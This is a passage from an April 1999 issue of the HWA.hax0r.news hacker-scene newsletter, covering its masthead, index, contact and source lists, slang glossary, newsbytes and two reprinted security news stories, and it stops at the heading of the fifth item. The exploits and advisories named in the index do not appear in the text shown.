Copy Link
Add to Bookmark
Report

hwa-hn15

eZine's profile picture
Published in 
HWA
 · 5 years ago

  

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 15 Volume 1 1999 April 25 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================


"Silly hacker, root is for administrators"
- Project Gamma


Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #15

=-----------------------------------------------------------------------=



*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #15


=--------------------------------------------------------------------------=




[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Walls and security decoys........................................
04.0 .. Securities fraud man released on $50,000 bond....................
05.0 .. Another privacy hole in MSIE 5.0 ................................
06.0 .. High tech on the battlefield.....................................
07.0 .. Hotmail has similar vulnerabilty to last weeks rocketmail advisory
08.0 .. Vulnerability in MacPerl CGI ....................................
09.0 .. The Adobe Acrobat NetBus scare thread;...........................
10.0 .. Crackpipe.c bypasses any firewalls via tunneling (linux).........
11.0 .. Unix rshd and rsh/rpc vulnerabilties in WindowsNT................
12.0 .. Are your IT professionals on Drugs?..............................
13.0 .. Rand corporation releases a paper on Cyber Terrorism.............
14.0 .. FAA to implement CAPS............................................
15.0 .. The Ebayla Hack..................................................
16.0 .. Cool security in Dutch PTT site allows users to send anonymous spam
17.0 .. Cold Fusion vulnerability, thousands of sites exposed to danger.
18.0 .. Privacy at risk in e-commerce rush ..............................
18.1 .. CC numbers left vulnerable by many shopping cart programs........
18.2 .. E-tailers scramble to fix security holes.........................
19.0 .. Got lots of time and computing power on your hands?..............
20.0 .. EU and US disagree on privacy laws...............................
21.0 .. Compuserve in court over slander charges.........................
22.0 .. Cyberwar and Netwar..............................................
23.0 .. IT Managers push for better online security......................
24.0 .. Popular Mechanics article "Hackers:America's real threat".....FUD
25.0 .. URL bug in AIM creates a DoS ....................................
26.0 .. Shutting up Cell Phones..........................................
27.0 .. Interview with Aleph1............................................
28.0 .. World Wide Wangle cmp net techweb article (FUD)..................
29.0 .. Microsoft DHTML patch advisory...................................
30.0 .. Microsoft MSIE4 and 5 vulnerabilities patch advisory.............
31.0 .. [ISN] DoD considers disconnecting from the net because of attacks.
32.0 .. [ISN] Digital Dicks...............................................
33.0 .. [ISN] Spooktech99.................................................
34.0 .. [ISN] review:"Ethical and Social Issues in the Information Age",..
35.0 .. [ISN] Update your AV software!, CIH virus to hit April 26th......
36.0 .. [ISN] More online store problems.................................
37.0 .. Mitnick Documents exposed........................................
38.0 .. New LPR package (linux)..........................................
39.0 .. New PROCMAIL package (linux) ....................................
40.0 .. Final call for papers for CQRE (Secure)..........................
41.0 .. Anyboard WWW vulnerability.......................................
42.0 .. Egroups bug......................................................
43.0 .. [ISN] Ok lets see some I.D (Biometrics)..........................
44.0 .. Javascript hotmail password trap ................................
45.0 .. Discus web based discussion software advisory....................
=--------------------------------------------------------------------------=


AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................

HA.HA .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

HOW.TO .. "How to hack" by our illustrious editor.........................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]



00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.



Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA



00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

HiR:Hackers Information Report... <a href="
http://axon.jccc.net/hir/">http://axon.jccc.net/hir/</a>
News & I/O zine ................. <a href="
http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="
http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="
http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="
http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="
http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls (HNN)..................<a href="
http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="
http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD ..............................<a href="
http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="
http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+........................<a href="
http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+........................<a href="
http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+........................<a href="
http://securityhole.8m.com/">http://securityhole.8m.com/</a>

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...


http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="
http://www.cnn.com/SEARCH/">Link</a>

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>

http://www.ottawacitizen.com/business/
<a href="
http://www.ottawacitizen.com/business/">Link</a>

http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="
http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>

http://www.zdnet.com/zdtv/cybercrime/
<a href="
http://www.zdnet.com/zdtv/cybercrime/">Link</a>

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="
http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>

NOTE: See appendices for details on other links.



http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>

http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="
http://freespeech.org/eua/">Link</a>

http://ech0.cjb.net ech0 Security
<a href="
http://ech0.cjb.net ech0 Security">Link</a>

http://net-security.org Net Security
<a href="
http://net-security.org">Link</a>
...


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

<a href="
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "
noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "
CC" the bugtraq
reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)



Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe,
visit http://www.counterpane.com/unsubform.html.  Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of
Counterpane Systems, the author of "
Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.  He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
     
                      ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "
subscribe isn".



@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black


Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondants please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.



N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA



00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "
new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "
is not equal to" or "does not equal"
ASC(247) "
wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "
script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "
Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "
Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "
you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "
telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "
w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-




01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman

and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)


kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"
What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99






+++ When was the last time you backed up your important data?


++ April 24th today many websites including the net-security, 403-security and other
sites redirected traffic to a strike site protesting HiNet's monopoly and high pricing
for internet access in Croatia (.hr) so if you couldn't access a specific croatian
site on the 24th this internet protest was likely your reason...for more info try
accessing http://www.cwl.voyager.hr/dosta/eng/index.html the main strike info site.

"
Who are we? We live in Croatia. We live on the Internet. We earn our living
at the Internet. We work on the Internet. We are the internet.
We pay for the privilege of our participation on the Internet, dearly, to the Croatian ISPs,
every month, without exception. We are being taken for granted. We are being exploited,
because we have no choice, because we need the Internet and we can’t manage without it.
We've had ENOUGH!"


++ www.innerpulse.com was not hacked according to Project Gamma who talked to Siko
and was told it was hosting problems (as we encountered on our mirror site at
cubesoft), anyway the site can be accessed via this ip/url: http://209.54.234.96/
(ed's note: our site came back online but we could still not access our account
as of this writing - Ed)

++ Excellent paper on Simulating Cyberwar and Defences
http://all.net/journal/ntb/simulate/simulate.html

++ From www.net-security.org
WINDOWS 2000 BETA 3
by deepcase, Tuesday 20th Apr 1999 on 12:01 pm CET
As Microsoft promised on CeBit 99 the Beta 3 of Windows 2000 is now available for
the public. The Beta 3 with Professional and Server version can be orderd for about
50$. This package called "
Corporate Preview" includes a 3 month support. Microsoft
said that Beta 3 will be out due next week ...

++ From www.net-security.org
VIRGIN NET SUES CUSTOMER
by BHZ, Wednesday 21st Apr 1999 on 11:48 am CET
After having its e-mail briefly boycotted by a spam-defense network, British Internet
service provider Virgin Net is suing a former subscriber for sending spam from its
network. The spammer's activity resulted in the company being put briefly on the
Realtime Blackhole List (RBL), an Internet e-mail boycotting tool. The damage to
Virgin's reputation prompted the company to sue the alleged spammer for breach of
the terms and conditions of the Virgin Net customer contract. . Read whole story on
Wired. http://www.wired.com/news/news/technology/story/19224.html


Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

No emails fit for inclusion in the newsletter this week!

================================================================

@HWA


02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("
Read commented source!\n\n");

/*
*Well this is issue #15, I didn't have time to html'ize the whole ish and am considering
*goin back to a text-only mode since it takes a lot of time to edit in the links for the
*html version, anyway here it is, have at it....
*
*
* - Ed
*
*
*/
printf ("
EoF.\n");
}


Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.


@HWA

03.0 Walls and security decoys
~~~~~~~~~~~~~~~~~~~~~~~~~~

from CMP techweb http://www.techweb.com/wire/story/TWB19990416S0024

Technology News


Walls And Decoys Safeguard Servers
(04/16/99, 5:35 p.m. ET)
By Rutrell Yasin , InternetWeek

Two network security vendors are taking different approaches to help IT
managersprotect corporate servers from network-based attacks.

One approach builds a wall around Windows NT servers, safeguarding critical
applications and data; the other lures potential snoopers to a decoy server,
catching them in the act.

Network-1 Security Solutions Inc. recently unveiled CyberWallPlus-SV,
server-based software that protects Windows NT servers from internal and
external attacks.

Meanwhile, Network Associates Inc. unveiled CyberCop Sting, a decoy server
that traces and tracks hackers who attempt to break into computer systems.

CyberWallPlus-SV adds security functions not found in Windows NT such as
stateful packet inspection, protocol and address filtering as well as network
intrusion detection and audit logging, said Al McGuire, an information security
consultant at Network-1.

Mark Edwards, an analyst at the NTShop consultancy who tested CyberWallPlus-SV,
said the software is in a position to intercept traffic before NT has a chance to
see it because it works in the kernel of the operating system.

The server software also provides a level of intrusion detection not found in
firewalls. For example, firewalls prevent ping-of-death or denial-of-service attacks
by blocking the ping from coming through the firewall.However, IT departments may
have a need to let some pings through, Edwards said.

CyberWallPlus-SV examines the ping for attack signatures and either blocks it or
shuts down the originating IP address until an administrator can determine whether
to let the ping through, he said.

The software is available now. Pricing starts at $1,995.

While CyberWallPlus-SV keeps the bad guys out of the server, Network Associates'
CyberCop Sting works to trap them. The decoy server operates by placing fictitious
data on a server that has low security protection but sophisticated monitoring
technology.

Chris Ward, a security manager at Pagemart, a provider of wireless messaging services
and user of NAI tools, said a decoy server is an interesting concept. The trick is to
deploy it so only a few people in the company know it's there. A skilled employee
could avoid such a system, he said.

Last week, we walked a systems administrator out the door because he hacked into other
systems. CyberCop would be fascinating to play with, but I don't know how useful it will
be, Ward said.

@HWA

04.0 Securities fraud man released on $50,000 bail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/

SECURITY FRAUD
by BHZ, Saturday 17th Apr 1999 on 3:59 pm CET
An employee of California-based PairGain Technology Inc. was arrested today in
North Carolina on federal charges of fabricating a Bloomberg news service report and
posting it on the Internet, driving up the company's stock. The FBI arrested Gary Dale
Hoke, 25, at his Raleigh, N.C., home on charges of securities fraud for allegedly
disseminating false information about the company, whose stock is publicly traded,
the U.S. attorney's office in Los Angeles said. Hoke was arraigned in North Carolina,
ordered to report to California at an unspecified date and released on $50,000 bond,
said Assistant U.S. Attorney Christopher Painter.


@HWA

05.0 Another privacy hole in MSIE 5.0
